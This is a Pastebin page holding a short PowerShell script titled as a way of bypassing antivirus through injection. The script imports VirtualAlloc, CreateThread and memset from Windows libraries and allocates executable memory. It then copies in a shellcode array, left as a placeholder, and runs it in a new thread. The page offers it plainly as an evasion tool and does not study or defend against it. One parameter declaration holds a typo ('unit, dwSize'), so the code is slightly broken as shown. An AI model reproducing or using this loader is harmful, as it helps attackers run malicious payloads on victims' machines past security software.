Advertisement
FlyFar

bypassing antivirus using PowerShell Injection method - Code

Jun 26th, 2023
940
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PowerShell 0.88 KB | Cybersecurity | 0 0
  1. $code = '
  2. [DllImport("kernel32.dll")]
  3. public static extern IntPtr VirtualAlloc(IntPtr lpAddress, unit, dwSize, uint fAllocationType, uint flProtect);
  4.  
  5. [DllImport("kernel32.dll")]
  6. public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
  7.  
  8. [DllImport("msvcrt.dll")]
  9. public static extern IntPtr memset(IntPtr dest, uint src, uint count);';
  10.  
  11. $winFunc =
  12.     Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;
  13.  
  14. [Byte[]];
  15. [Byte[]]$sc = PLACE YOUR SHELLCODE HERE;
  16.  
  17. $size = 0x1000;
  18.  
  19. if ($sc.Length -gt 0x1000) {$size = $sc.Length};
  20.  
  21. $x = $winFunc::VirtualAlloc(0,$size,0x3000,0x40);
  22.  
  23. for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};
  24.  
  25. $winFunc::CreateThread(0,0,$x,0,0,0);for (;;) {Start-sleep 60};
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement